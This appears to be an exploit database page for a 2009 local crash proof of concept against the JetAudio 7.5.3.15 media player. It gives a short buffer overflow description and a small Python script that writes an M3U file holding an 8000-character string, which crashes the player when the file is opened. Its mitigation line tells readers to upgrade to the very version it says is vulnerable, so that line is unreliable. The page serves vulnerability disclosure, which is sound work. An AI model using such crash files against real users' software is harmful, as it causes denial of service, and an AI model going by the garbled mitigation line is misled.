header-logo
Suggest Exploit
vendor:
JetAudio
by:
Dr_IDE
7,5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: JetAudio
Affected Version From: 7.5.3.15
Affected Version To: 7.5.3.15
Patch Exists: YES
Related CWE: N/A
CPE: a:cowon:jetaudio
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2009

JetAudio 7.5.3.15 Local Crash PoC

A buffer overflow vulnerability exists in JetAudio 7.5.3.15 due to improper bounds checking of user-supplied input. An attacker can exploit this vulnerability by creating a specially crafted M3U file containing an overly long string, which can cause a denial of service condition when the file is opened.

Mitigation:

Upgrade to the latest version of JetAudio 7.5.3.15 or later.
Source

Exploit-DB raw data:

#!/usr/bin/env python

###########################################################################################
#
# JetAudio 7.5.3.15 Local Crash PoC
# Found By: Dr_IDE
# Download: http://www.cowonamerica.com/download/
# Tested on Windows XP SP2
# 
############################################################################################

# Crash occurs in msvcr90.dll which is included with this version of the program.


buff = ("http://" + "\x41" * 8000);

print " [-] Creating payload.";

f1 = open('JA_7.5.3.15.M3U','w');
f1.write(buff);
f1.close();

print " [-] File created successfully.";

# milw0rm.com [2009-08-06]

Navigation

Suggest Exploit

Services By CQR